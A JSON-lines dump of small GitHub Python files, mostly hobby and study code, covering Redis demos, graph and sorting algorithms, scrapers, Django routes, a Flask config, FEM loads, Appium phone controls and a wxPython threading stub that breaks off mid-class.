{\"id\":\"3\",\"heure\":\"1:23\",\"numero_origine\":\"0949048667\",\"statut\":\"En cours\", \"duree\":\"0:40\", \"operateur_id\":\"1\", \"description\":\"Appel\"}\n appel4 = {\"id\":\"4\",\"heure\":\"22:56\",\"numero_origine\":\"0756048615\",\"statut\":\"En cours\", \"duree\":\"0:04\", \"operateur_id\":\"3\", \"description\":\"Appel travail\"}\n \n r.hmset(\"appel1\", appel1)\n r.hmset(\"appel2\", appel2)\n r.hmset(\"appel3\", appel3)\n r.hmset(\"appel4\", appel4)\n except Exception as e:\n print(e)\n#To vizualize the properties of a appel\ndef view_appel(id):\n msg = r.hgetall(\"appel\"+id)\n print(msg)\n#Create the operateurs with certains properties\ndef create_operateurs():\n try:\n op1 = {\"id\":\"1\",\"nom\":\"James\", \"prenom\":\"Clara\", \"age\":\"15\"} \n op2 = {\"id\":\"2\",\"nom\":\"Silva\", \"prenom\":\"Augusto\", \"age\":\"67\"}\n op3 = {\"id\":\"3\",\"nom\":\"Costa\", \"prenom\":\"Maria\", \"age\":\"34\"}\n \n r.hmset(\"op1\", op1)\n r.hmset(\"op2\", op2)\n r.hmset(\"op3\", op3)\n except Exception as e:\n print(e)\n#Delete database informations\ndef delete_db():\n r.flushall()\n#Get all the appels of a especific Status\ndef search_statut(status):\n for key in r.scan_iter():\n if r.hmget(key,'statut'):\n for hash in r.hscan_iter(key, 'statut'):\n if status in hash[1]:\n print(key)\n return key\n#Get all the elements of the database\ndef get_all():\n for key in r.scan_iter():\n print(key)\n#Get all the operatus of the appels in Cours de traitement\ndef get_operateurs(key):\n print(key)\n for op_id in r.hscan_iter(key,'operateur_id'):\n for op in r.scan_iter():\n if r.hmget(op,'nom'):\n for hash in r.hscan_iter(op,'id'):\n if op_id[1] == hash[1]:\n print(r.hmget(op,'nom'))\n \n#Calling out the functions made\n\n#Testing database connection\ntest_connection_database()\n#Create db\ncreate_appels()\nview_appel(\"2\")\ncreate_operateurs()\n#Search appels en cours, non affecte\nsearch_statut(\"En cours\")\nsearch_statut(\"Non affecte\")\n#all operateurs of the appels\nget_operateurs(search_statut(\"En cours\"))\n","repo_name":"Scetienne/projetsNoSQL","sub_path":"redis_evaluation.py","file_name":"redis_evaluation.py","file_ext":"py","file_size_in_byte":3036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35128280767","text":"graph = {\n 'A': ['B', 'F', 'I'],\n 'B': ['A', 'E', 'C'],\n 'C': ['B', 'E', 'D'],\n 'D': ['C', 'G', 'H'],\n 'E': ['B', 'C', 'G'],\n 'F': ['A', 'G'],\n 'G': ['E', 'F', 'D'],\n 'H': ['D'],\n 'I': ['A']\n}\n\n\ndef bfs(graph, start_node):\n visit = list()\n queue = list()\n\n queue.append(start_node)\n\n while queue:\n node =queue.pop(0)\n if node not in visit:\n visit.append(node)\n queue.extend(graph[node])\n\n return visit\n\n\nprint(bfs(graph, 'A'))","repo_name":"mjhongg/Study","sub_path":"algorithm/bfs_by_queue.py","file_name":"bfs_by_queue.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4499413463","text":"#time complexity is O(n^2)\ndef selectionSort(arr):\n length=len(arr)\n #put the correct element at ith position\n for i in range(length-1):\n minIndex=i\n #calculating the index of minimum element for this iteration\n for j in range(i+1,length):\n if(arr[j] 1:\n return randint(1, side_amount)\n else:\n raise ValueError(\"The amount of sides need to be a minimum of two.\")\n\n\ndef roll_all(dice_to_roll: dict[int, int]) -> list[int]:\n results = []\n for side_amount in dice_to_roll:\n for _ in range(dice_to_roll[side_amount]):\n results.append(roll(side_amount))\n return results\n","repo_name":"roan-paulus/yogsobot","sub_path":"yogsobot/dice.py","file_name":"dice.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34246781208","text":"# The total number of babies named Odin born in Colorado according to the Social Security Administration\nimport shutil\nimport requests\nurl = 'http://www.ssa.gov/OACT/babynames/state/namesbystate.zip'\n# Downloading will take awhile...\nprint(\"Downloading\", url)\nresp = requests.get(url)\n# save to hard drive\nwith open(\"/tmp/ssastates.zip\", \"wb\") as f:\n f.write(resp.content)\n# unzip\nshutil.unpack_archive(\"/tmp/ssastates.zip\", \"/tmp\")\n# open up the file\nrows = open(\"/tmp/CO.TXT\").readlines()\ntotes = 0\nfor r in rows:\n if 'Odin' in r:\n totes += int(r.split(',')[4])\nprint(totes)\n\n","repo_name":"stanfordjournalism/search-script-scrape","sub_path":"scripts/80.py","file_name":"80.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":1228,"dataset":"github-code","pt":"48"} +{"seq_id":"493306894","text":"import requests\nimport os\n\nrequest = requests.get('https://api.github.com/users/amfoss/repos?per_page=100')\nrepos = request.json()\nprint(\"amFOSS repositories\\n\")\nfor n in range(0,len(repos)):\n print( n+1, repos[n]['name'] ,\"\\n\")\nfor n in range(0,len(repos)):\n perceval=\"perceval git --json-line \" + repos[n]['html_url'] + \">> commits.json\"\n os.system(perceval)\n \n","repo_name":"azeemyoonus/amfoss-tasks","sub_path":"task-08/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16556305502","text":"from collections import defaultdict\n\n\nclass Solution(object):\n def canFinish1(self, numCourses, prerequisites):\n \"\"\"\n :type numCourses: int\n :type prerequisites: List[List[int]]\n :rtype: bool\n \"\"\"\n go = [[0] * numCourses for _ in range(numCourses)]\n requisite = [[0] * numCourses for _ in range(numCourses)]\n que = deque()\n for j in prerequisites:\n go[j[0]][j[1]] += 1\n requisite[j[1]][j[0]] += 1\n\n for i in range(numCourses):\n if sum(go[i]) == 1:\n que.append(i)\n if not que:\n return False\n print(requisite)\n \n while que:\n start = que.popleft()\n for i in requisite:\n i[start] = 0\n for idx, i in enumerate(requisite[start]):\n if i == 1 and sum(requisite[idx]) == 0:\n requisite[start][idx] = 0\n que.append(idx)\n return True if not que else False\n\n ## 교재 코드\n def canFinish(self, numCourses, prerequisites):\n graph = defaultdict(list)\n\n for x, y in prerequisites:\n graph[x].append(y)\n traced = set()\n visited = set()\n\n def dfs(i):\n # 판독하는 부분\n if i in traced: # 순환구조이면, 탈출(못하는 거라서)\n return False\n if i in visited: # 방문한 곳이면 일단은 그냥 고\n return True\n\n traced.add(i)\n for y in graph[i]: # 연결된 부분 전체 파악\n if not dfs(y): # 순환 여부 확인\n return False\n\n traced.remove(i) # 이제 이친구는 순환 확인에 필요없음\n visited.add(i) # 방문 처리\n return True\n\n for x in list(graph):\n if not dfs(x):\n return False\n return True\n","repo_name":"junhong625/MOCOCO","sub_path":"[7주차] 그래프/[LeetCode 207번] Course Schedule/홍영민_교재.py","file_name":"홍영민_교재.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"34697124954","text":"from django.urls import path\nfrom app import views\n\nurlpatterns = [\n path('', views.IndexView.as_view(), name='index'),\n path('post//', views.PostDetailView.as_view(), name='post_detail'),\n path('post/new/', views.CreatePostView.as_view(), name='post_new'),\n path('post//edit/', views.PostEditView.as_view(), name='post_edit'),\n path('post//delete/', views.PostDeleteView.as_view(), name='post_delete'),\n path('service/', views.ServiceView.as_view(), name='service'),\n path('blog/', views.BlogView.as_view(), name='blog'),\n path('price/', views.PriceView.as_view(), name='price'),\n path('contact/', views.ContactView.as_view(), name='contact'),\n path('wash/', views.WashView.as_view(), name='wash'),\n path('coating/', views.CoatingView.as_view(), name='coating'),\n path('polishing/', views.PolishingView.as_view(), name='polishing'),\n path('diagnosis/', views.DiagnosisView.as_view(), name='diagnosis'),\n path('program/', views.ProgramView.as_view(), name='program'),\n path('campany/', views.CampanyView.as_view(), name='campany'),\n path('store', views.StoreView.as_view(), name='store'),\n path('store//', views.StaffView.as_view(), name='staff'),\n path('calendar/', views.CalendarView.as_view(), name='calendar'),\n path('calendar////', views.CalendarView.as_view(), name='calendar'),\n path('booking/////', views.BookingView.as_view(), name='booking'),\n path('thanks/', views.ThanksView.as_view(), name='thanks'),\n path('mypage////', views.MyPageView.as_view(), name='mypage'),\n path('mypage/holiday/////', views.Holiday, name='holiday'),\n path('mypage/delete/////', views.Delete, name='delete'),\n path('category//', views.CategoryView.as_view(), name='category')\n]","repo_name":"Kogepan69/tatuo_coat","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70253136","text":"import requests\nimport string\n\n\nhtml_start_text = \"\\n\"\\\n\"\\n\\n\"\\\n\"\\n\"\\\n\"Tag Cloud Generator\\n\"\\\n\"\\n\"\\\n\"\\n\"\\\n\"
    \\n\"\n\nhtml_end_text = \"
    \" \\\n \" \" \\\n \"\"\n\nmin_font_size = 20\nmax_font_size = 200\n\n\n# Get the speech and store the main text in a variable\nspeech_url = requests.get(\"http://193.1.33.31:88/pa1/gettysburg.txt\")\nspeech_body = speech_url.text\n\nstopwords_url = requests.get(\"http://193.1.33.31:88/pa1/stopwords.txt\")\nstopwords_body = stopwords_url.text\n\n# Make it into a list so that each word is counted on its own\nspeech_words_list = speech_body.split()\nstopwords_list = stopwords_body.split(sep=\",\")\n\n# Initialise a dictionary\nd = {}\n\n# Print the words that are greater than 3 characters\nfor word in speech_words_list:\n if len(word) > 4:\n word = word.lower()\n word = word.strip(string.punctuation)\n print(word)\n if word in d:\n d[word] += 1\n else:\n d[word] = 1\n\n# Create Word Cloud\nwith open(\"cloud_tag.html\", 'w') as cloud:\n cloud.write(html_start_text)\n for word in speech_words_list:\n cloud.write(f\" {word} \\n\")\n cloud.write(html_end_text)\n","repo_name":"nataliebryden/Word-Cloud","sub_path":"word-cloud.py","file_name":"word-cloud.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19185538465","text":"from sys import stdout\r\nimport numpy as np\r\n\r\ndef showprogress(percentage, message='', sub=False):\r\n \"\"\"\r\n Show a progress bar in your command line to track the progress of your process. This is meant to\r\n be used in cases such as for-loops that are susceptible to take some time to exectute\r\n (eg. predicting in a for loop for a non-trivial number of iterations).\r\n @param percentage: a float number less or equal to 1 that represents the current progress. This\r\n this can simply be thought of as the quotient \"i/total\" where \"i\" is the index of the\r\n current element in the iteration, and \"total\" is the total number of elements to iterate\r\n through. NOTE: You're advised to you \"i+1\" instead of \"i\" and to put the statement at\r\n the very bottom of the loop.\r\n @param message (optional): a string message. If this variable is used and assigned a string,\r\n that string will be displayed next to the progress bar. This is mostly useful in case \r\n going through one iteration may require some heavy computations and therefore the for\r\n loop remains on the same element for some time. In such cases, this argument can be used\r\n to better indicate the status of the progress, eg. if there's a sort of label associated\r\n with each such iteration (like the name of something corresponding to the current\r\n index) we can display a message with that label (eg. \"Now parsing file file_name\").\r\n @param sub (optional): a boolean determining weather the current process is a sub process. This\r\n is useful because this progress method will display a new line once it reaches 100%. If\r\n we want to avoid that, we set this argument to \"True\". This argument is False by\r\n default.\r\n \r\n NOTE: It's advised to put this method as last statement of the iteration, with the index being\r\n the next index instead of the current one, i.e. \"i\" in \"i/total\" should actually be \"i+1\".\r\n \r\n Example Usage:\r\n for i,element in enumerate(array):\r\n ...\r\n # some computation\r\n ...\r\n util.showprogress((i+1)/len(array))\r\n\r\n # OR\r\n\r\n for i in range(some_integer_length):\r\n ...\r\n # some computation\r\n ...\r\n util.progress((i+1) / some_integer_length)\r\n \"\"\"\r\n length = 30\r\n percentage = percentage if percentage < 1 else 1\r\n done = int(length*percentage)\r\n left = length - done\r\n arrow = 0\r\n if done < length:\r\n done -= 1 if done > 0 else 0\r\n arrow = 1\r\n stdout.write('\\r[{}{}{}] {}% {}'.format(\r\n '='*done, '>'*arrow, '.'*left, int(round(percentage, 2)*100), message))\r\n if percentage == 1 and not sub:\r\n print('')\r\n\r\n\r\ndef chopin(references, candidates, mean=False):\r\n \"\"\"\r\n Chord Proxy Substitution ([Cho]rd [P]roxy Subst[i]tutio[n])\r\n Given a reference chord and a candidate chord, the Chopin evaluation score gives an estimate (in\r\n the form of a probability ranging from 0 to 100) of how confident we can be that the candidate\r\n chord can be used as a valid proxy to substitute in place of the reference chord.\r\n @param references: nd-array/list of frames. This is a group of integers where a value greater\r\n than 0 indicates a note being played. The shape of 'references' must be at least 1 and\r\n the same as the shape of `candidates`.\r\n @param candidates: nd-array/list of frames. This is a group of integers where a value greater\r\n than 0 indicates a note being played. The shape of 'candidates' must be at least 1 and\r\n the same as the shape of `references`.\r\n @param mean(optional): a boolean determining if we want the method to precompute the mean of all\r\n the scores before returning. If True, the method will return a float value corresponding\r\n to the overall score, if False, the method will return an nd-array of similar dimensions\r\n as the 'candidates' parameters where each frame is replaced by its score. This argument\r\n is False by default.\r\n \r\n @return score: if `mean` is False, an nd-array of the similar shape as the 'candidates'\r\n parameter except for the last dimension where each frame array is replaced by its\r\n respective score against the corresponding references frame; if `mean` is True, the mean\r\n of all the scores for all the frames.\r\n \"\"\"\r\n references, candidates = np.asarray(references, dtype=int), np.asarray(candidates, dtype=int)\r\n assert references.ndim >= candidates.ndim and references.ndim > 0, \"The references and \"\\\r\n +\"candidates arrays must have the same number of dimensions\"\r\n stacked = np.stack([references, candidates], axis=-2)\r\n nonzeros = np.apply_along_axis(lambda x: str(np.nonzero(x)[0]), -1, stacked)\r\n\r\n def seq2score(nonzeros):\r\n ref_idx, can_idx = nonzeros\r\n ref_idx = np.fromstring(ref_idx[1:-1], sep=' ', dtype=int)\r\n can_idx = np.fromstring(can_idx[1:-1], sep=' ', dtype=int)\r\n if (ref_idx.shape[0] == 0 and can_idx.shape[0] != 0) or\\\r\n (ref_idx.shape[0] != 0 and can_idx.shape[0] == 0):\r\n # Either `candidate` played where `reference` didn't play, or `candidate` didn't play\r\n # where `reference` played. In both cases, `candidate` is definitely not a proxy of\r\n # `reference`.\r\n return 0\r\n elif ref_idx.shape[0] == 0 and can_idx.shape[0] == 0:\r\n # `candidate` didn't play where `reference` didn't play. This is a 100% match.\r\n return 1\r\n\r\n root_score = 1\r\n ref_to_can = 1\r\n can_to_ref = 1\r\n NBR_NOTES = 12\r\n\r\n # As far as the Chopin score is concerned, we're only interested in the musical notes, not\r\n # the octave in which they're played. Therefore, we simplify all of them to the basic 12\r\n # notes.\r\n ref_idx = ref_idx%NBR_NOTES\r\n can_idx = can_idx%NBR_NOTES\r\n\r\n # Root Score\r\n if can_idx[0] == ref_idx[0]:\r\n # `candidate` has the same root note as `reference`. 100% match on the root.\r\n root_score = 1\r\n elif can_idx[0] in ref_idx[1:]:\r\n # If the root note in the candidate is a valid relative 3rd or 5th of the root note in\r\n # the reference and exists amongst the notes of the reference, then it's not a total\r\n # match but a very probably one (75%). Else if the new root note is not a relative of\r\n # the old root note, but is still amongst the notes in reference, then we give it 50%.\r\n true_root = ref_idx[0]\r\n relatives = [(true_root+i)%NBR_NOTES for i in [3,4,6,7,8]]\r\n root_score = .75 if can_idx[0] in relatives else .5\r\n else:\r\n root_score = .25\r\n \r\n # Reference to Candidate Score\r\n for note in ref_idx[1:]:\r\n if note not in can_idx:\r\n ref_to_can -= 1/len(ref_idx[1:])\r\n\r\n # Candidate to Reference Score\r\n for note in can_idx[1:]:\r\n if note not in ref_idx:\r\n can_to_ref -= 1/len(can_idx[1:])\r\n\r\n return root_score*ref_to_can*can_to_ref*100\r\n\r\n scores = np.apply_along_axis(seq2score, -1, nonzeros)\r\n if mean:\r\n return np.mean(scores)\r\n else:\r\n return scores\r\n\r\nif __name__ == '__main__':\r\n ref1 = [[[1,0,1,1], [1,0,1,1], [0,1,1,0]]]\r\n ref2 = [[[1,1,1,1], [0,0,1,1], [0,0,1,0]]]\r\n can1 = [[[0,1,1,1], [0,1,1,0], [0,0,0,0]]]\r\n can2 = [[[1,0,1,1], [1,0,1,1], [0,0,1,0]]]\r\n\r\n ref = [[[1,0,1,1], [1,0,1,1], [0,1,1,0]], [[1,1,1,1], [0,0,1,1], [0,0,1,0]]]\r\n can = [[[0,1,1,1], [0,1,1,0], [0,1,1,0]], [[1,0,1,1], [1,0,1,1], [0,0,1,0]]]\r\n # ref = [1,1,1,0]\r\n # can = [0,0,1,0]\r\n ref = [[1,0,1,1], [1,0,1,1], [0,1,1,0]]\r\n can = [[0,1,1,1], [0,1,1,0], [0,1,1,0]]\r\n\r\n s = chopin(ref, can)\r\n s /= 6\r\n print(s)","repo_name":"ndombe/gaim","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":7998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15259774067","text":"import math\n\ndef read_input(path):\n f = open(path, 'r')\n lines = [line.strip() for line in f.readlines()]\n f.close()\n return lines\n\ndef solve(lines):\n highest_seat_id = 0\n \n for line in lines:\n current_seat_id = get_seat_id(line)\n \n if current_seat_id > highest_seat_id:\n highest_seat_id = current_seat_id\n \n return highest_seat_id\n\ndef solve2(lines):\n seat_ids = []\n for line in lines:\n current_seat_id = get_seat_id(line)\n seat_ids.append(current_seat_id)\n \n sorted_seat_ids = sorted(seat_ids)\n \n missing_seat_id = sorted_seat_ids[0]\n previous_seat_id = sorted_seat_ids[0]\n for current_seat_id in sorted_seat_ids[1:]:\n diff = current_seat_id - previous_seat_id\n if diff != 1:\n missing_seat_id = current_seat_id - 1\n print('previous_seat_id', previous_seat_id)\n print('current_seat_id', current_seat_id)\n print('missing_seat_id', missing_seat_id)\n previous_seat_id = current_seat_id\n \n return missing_seat_id\n \ndef get_seat_id(line):\n row = 0\n \n for i, n in enumerate(line[::-1][3:]):\n if n == 'B':\n row += math.pow(2, i)\n \n column = [0, 1, 2, 3, 4, 5, 6, 7]\n \n for n in line[-3:]:\n if n == 'R':\n l = int((len(column) / 2))\n column = column[l:]\n \n if n == 'L':\n l = int((len(column) / 2))\n column = column[:l]\n \n column = column[0]\n \n return int(row * 8 + column)\n\nif __name__ == '__main__':\n lines = read_input('test_input.txt')\n expected = 820\n actual = solve(lines)\n if expected == actual:\n print('ok')\n else:\n print('fail')\n \n lines = read_input('input.txt')\n expected = 989\n actual = solve(lines)\n if expected == actual:\n print('ok')\n else:\n print('fail')\n \n expected = 548\n lines = read_input('input.txt')\n actual = solve2(lines)\n print(actual)\n if expected == actual:\n print('ok')\n else:\n print('fail')","repo_name":"09try/AdventOfCode","sub_path":"2020/05/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42445465364","text":"import os\nimport urllib\nbasedir = os.path.abspath(os.path.dirname(__file__))\nparams = urllib.parse.quote_plus('DRIVER={SQL Server};SERVER=DESKTOP-JSI96RP;DATABASE=Dev_Data_demo;Trusted_Connection=yes;')\n\n\nclass Config:\n SECRET_KEY = os.environ.get('SECRET_KEY') or os.urandom(32)\n MAIL_SERVER = os.environ.get('MAIL_SERVER', 'smtp.googlemail.com')\n MAIL_PORT = int(os.environ.get('MAIL_PORT', '587'))\n MAIL_USE_TLS = os.environ.get('MAIL_USE_TLS', 'true').lower() in \\\n ['true', 'on', '1']\n MAIL_USERNAME = os.environ.get('MAIL_USERNAME') # email address\n MAIL_PASSWORD = os.environ.get('MAIL_PASSWORD') # google application password\n PROJECT_MAIL_SUBJECT_PREFIX = '[Data_demo]' # shows on email subject, as project name\n PROJECT_MAIL_SUBJECT_PREFIX = 'PM Admin '\n PROJECT_ADMIN = os.environ.get('PROJECT_ADMIN')\n SSL_REDIRECT = False\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n SQLALCHEMY_RECORD_QUERIES = True\n PROJECT_DATA_PER_PAGE = 20\n PROJECT_SLOW_DB_QUERY_TIME = 0.5\n\n @staticmethod\n def init_app(app):\n pass\n\n\nclass DevelopmentConfig(Config):\n DEBUG = True\n SQLALCHEMY_DATABASE_URI = \"mssql+pyodbc:///?odbc_connect=%s\" % params\n\n\nclass TestingConfig(Config):\n TESTING = True\n SQLALCHEMY_DATABASE_URI = os.environ.get('TEST_DATABASE_URL') or \\\n 'sqlite://'\n WTF_CSRF_ENABLED = False\n\n\nclass ProductionConfig(Config):\n SQLALCHEMY_DATABASE_URI = \"mssql+pyodbc:///?odbc_connect=%s\" % params\n\n @classmethod\n def init_app(cls, app):\n Config.init_app(app)\n\n # email errors to the administrators\n import logging\n from logging.handlers import SMTPHandler\n credentials = None\n secure = None\n if getattr(cls, 'MAIL_USERNAME', None) is not None:\n credentials = (cls.MAIL_USERNAME, cls.MAIL_PASSWORD)\n if getattr(cls, 'MAIL_USE_TLS', None):\n secure = ()\n mail_handler = SMTPHandler(\n mailhost=(cls.MAIL_SERVER, cls.MAIL_PORT),\n fromaddr=cls.PROJECT_MAIL_SUBJECT_PREFIX,\n toaddrs=[cls.PROJECT_ADMIN],\n subject=cls.PROJECT_MAIL_SUBJECT_PREFIX + ' Application Error',\n credentials=credentials,\n secure=secure)\n mail_handler.setLevel(logging.ERROR)\n app.logger.addHandler(mail_handler)\n\n\nclass DockerConfig(ProductionConfig):\n @classmethod\n def init_app(cls, app):\n ProductionConfig.init_app(app)\n\n # log to stderr\n import logging\n from logging import StreamHandler\n file_handler = StreamHandler()\n file_handler.setLevel(logging.INFO)\n app.logger.addHandler(file_handler)\n\n\nconfig = {\n 'development': DevelopmentConfig,\n 'testing': TestingConfig,\n 'production': ProductionConfig,\n 'docker': DockerConfig,\n\n 'default': DevelopmentConfig\n}\n","repo_name":"Allen15763/Data_demo","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24906536311","text":"# Import Standard Libraries\nimport re\nimport logging\nimport scipy as np\n\n#===========================================================================\n# LoadTable\n#===========================================================================\n\n\nclass LoadTable(object):\n \"\"\" LoadTable\n\n Static Members:\n __type_int__ = \"Input idof is not int!\"\n __type_int_list__ = \"Input idofs is not int or list!\"\n\n Instance Members:\n name = table name\n type = table type (\"Loads\")\n path = file path to loads\n rvals = array of point loads per idof\n\n Public Methods:\n LoadTable(name, conf, props)\n initialize(mesh)\n readXML(path, mesh)\n setLoad(idof, rval)\n setLoads(idofs, rval)\n addLoad(idof, rval)\n addLoads(idofs, rval)\n rvals = getLoads()\n \"\"\"\n\n # Static:\n __type_int__ = \"Input idof is not int!\"\n __type_int_list__ = \"Input idofs is not int or list!\"\n\n # Public:\n\n #-----------------------------------------------------------------------\n # constructor\n #-----------------------------------------------------------------------\n\n def __init__(self, name, conf=None, props=None):\n \"\"\" Input: name = table name or ndof\n conf = output properties\n props = input properties \"\"\"\n if isinstance(name, str):\n self.name = name\n myProps = props.getProps(name)\n myConf = conf.makeProps(name)\n\n self.type = myProps.get(\"type\", \"Loads\")\n self.path = myProps.get(\"file\")\n\n myConf.set(\"type\", self.type)\n myConf.set(\"file\", self.path)\n\n elif isinstance(name, int):\n self.rvals = np.empty(name)\n self.rvals[:] = 0\n\n #-----------------------------------------------------------------------\n # initialize\n #-----------------------------------------------------------------------\n\n def initialize(self, mesh):\n self.rvals = np.zeros(mesh.dofCount())\n self.readXML(self.path, mesh)\n logging.info(\" %s file read\",self.path)\n return self.rvals\n\n #-----------------------------------------------------------------------\n # readXML\n #-----------------------------------------------------------------------\n\n def readXML(self, path, mesh):\n \"\"\" Input: path = path_to_file, mesh = Mesh \"\"\"\n with open(path, 'r') as file:\n\n flag_c = False\n\n for line in file:\n if line.startswith(\"\"):\n flag_c = True\n elif line.startswith(\"\"):\n flag_c = False\n\n if flag_c is True and not line.startswith(\"\"):\n dof = re.findall(r\"[a-zA-Z]+\", line)[0]\n [node, rval] = re.findall(r\"[-+]?\\d+ *\\.\\d+|[-+]?\\d+\", line)\n logging.debug(\" %s[%s] = %s\",dof, node, rval)\n idof = mesh.getDofIndex(int(node), dof)\n self.addLoad(idof, float(rval))\n\n #-----------------------------------------------------------------------\n # Load Methods\n #-----------------------------------------------------------------------\n \n def setLoad(self, idof, rval):\n \"\"\" Input: idof = dof index, rval = load to be set \"\"\"\n if isinstance(idof, int):\n self.rvals[idof] = rval\n else:\n raise TypeError(self.__type_int__)\n\n def setLoads(self, idofs, rval):\n \"\"\" Input: idofs = (list of) dof indices, rval = load to be set\"\"\"\n if isinstance(idofs, (int,list)):\n self.rvals[idofs] = rval\n else:\n raise TypeError(self.__type_int_list__)\n\n def addLoad(self, idof, rval):\n \"\"\" Input: idof = dof index, rval = load to be added \"\"\"\n if isinstance(idof, int):\n self.rvals[idof] += rval\n else:\n raise TypeError(self.__type_int__)\n\n def addLoads(self, idofs, rval):\n \"\"\" Input: idofs = (list of) dof indices, rval = load to be added \"\"\"\n if isinstance(idofs, (int,list)):\n self.rvals[idofs] += rval\n else:\n raise TypeError(self.__type_int_list__)\n\n #-----------------------------------------------------------------------\n # getLoads\n #-----------------------------------------------------------------------\n\n def getLoads(self):\n return self.rvals\n","repo_name":"erikjloo/Python-FEM","sub_path":"loadTable.py","file_name":"loadTable.py","file_ext":"py","file_size_in_byte":4459,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"13596334552","text":"from collections import deque, namedtuple\n\ninf = float(\"inf\")\nEdge = namedtuple('Edge', 'start, ')\n\nnof_junctions, nof_streets, total_time, nof_cars, starting_junction = map(int, input().split())\n# ignore lat and long information\nfor junction in range(nof_junctions):\n input()\ntopology = [[] for junction in range(nof_junctions)]\nfor street in range(nof_streets):\n start, end, direction, time, length = map(int, input().split())\n topology[start].append((end, time, length))\n if direction == 2:\n topology[end].append((start, time, length))\n\nvertices = set(range(0, nof_junctions))\ndistances = [inf] * nof_junctions\ndistances[starting_junction] = 0\nprevious_vertices = [None] * nof_junctions\n\nwhile vertices:\n current_vertex = min(vertices, key=lambda vertex: distances[vertex])\n if distances[current_vertex] == inf:\n break\n \n for neighbour, cost, _ in topology[current_vertex]:\n alternative_route = distances[current_vertex] + cost\n if alternative_route < distances[neighbour]:\n distances[neighbour] = alternative_route\n previous_vertices[neighbour] = current_vertex\n vertices.remove(current_vertex)\n\nreachable = []\nfor vertex in range(nof_junctions):\n if distances[vertex] < total_time:\n reachable.append(vertex)\nprint(f\"nof_junctions = {nof_junctions} nof_reachable = {len(reachable)}\") # all reachable within total_time\n","repo_name":"matthewrossi/coding-challenges","sub_path":"hash-code/2014/reduce_graph.py","file_name":"reduce_graph.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"45103489406","text":"from appium import webdriver\nfrom time import sleep\nfrom appium.webdriver.connectiontype import ConnectionType\n\ndesired_caps = {}\n\ndesired_caps[\"platformName\"] = \"Android\"\ndesired_caps[\"platformVersion\"] = \"7.1.2\"\ndesired_caps[\"deviceName\"] = \"emulator-5558\"\ndesired_caps[\"appPackage\"] = \"com.android.settings\"\ndesired_caps[\"appActivity\"] = \".Settings\"\ndesired_caps[\"noReset\"] = True\n\ndriver = webdriver.Remote(\"http://localhost:4723/wd/hub\", desired_caps)\n\n# 音量加\n# for i in range(3):\n# driver.keyevent(24)\n\n# sleep(3)\n# driver.keyevent(25)\n\n# 打开通知栏\n# driver.open_notifications()\n# 关闭通知栏\n# driver.back()\n\n# 获取当前网络\n# print(driver.network_connection)\n# driver.set_network_connection(ConnectionType.ALL_NETWORK_ON)\n\n# 截图\ndriver.get_screenshot_as_file(\"./xxx.png\")","repo_name":"lujun2019/test_scrip","sub_path":"手机操作api_2.py","file_name":"手机操作api_2.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24567483268","text":"import threading\n\nimport cv2\nimport wx\n\nfrom old_code_snippets.Camera import analyze_camera\n\nID_COUNT = wx.NewId()\nmyEVT_COUNT = wx.NewEventType()\nEVT_COUNT = wx.PyEventBinder(myEVT_COUNT, 1)\n\n\nclass CountingThread(threading.Thread):\n def __init__(self, parent, value):\n \"\"\"\n @param parent: The gui object that should recieve the value\n @param value: value to 'calculate' to\n \"\"\"\n threading.Thread.__init__(self)\n self._parent = parent\n self._value = value\n\n def run(self):\n \"\"\"Overrides Thread.run. Don't call this directly its called internally\n when you call Thread.start().\n \"\"\"\n # time.sleep(2) # our simulated calculation time\n ret = analyze_camera(cap)\n evt = CountEvent(myEVT_COUNT, -1, self.ret)\n wx.PostEvent(self._parent, evt)\n\n\nclass CountEvent(wx.PyCommandEvent):\n \"\"\"Event to signal that a count value is ready\"\"\"\n\n def __init__(self, etype, eid, value=None):\n \"\"\"Creates the event object\"\"\"\n wx.PyCommandEvent.__init__(self, etype, eid)\n self._value = value\n\n def GetValue(self):\n \"\"\"Returns the value from the event.\n @return: the value of this event\n\n \"\"\"\n return self._value\n\n\nclass CountingFrame(wx.Frame):\n def __init__(self, parent):\n wx.Frame.__init__(self, parent, title=\"Lets Count\", size=(300, 300))\n\n # Attributes\n\n # Layout\n self.__DoLayout()\n self.CreateStatusBar()\n\n # Event Handlers\n\n def __DoLayout(self):\n sizer = wx.BoxSizer(wx.HORIZONTAL)\n sizer.Add(CountingPanel(self), 1, wx.ALIGN_CENTER)\n self.SetSizer(sizer)\n self.SetMinSize((300, 300))\n\n\nclass 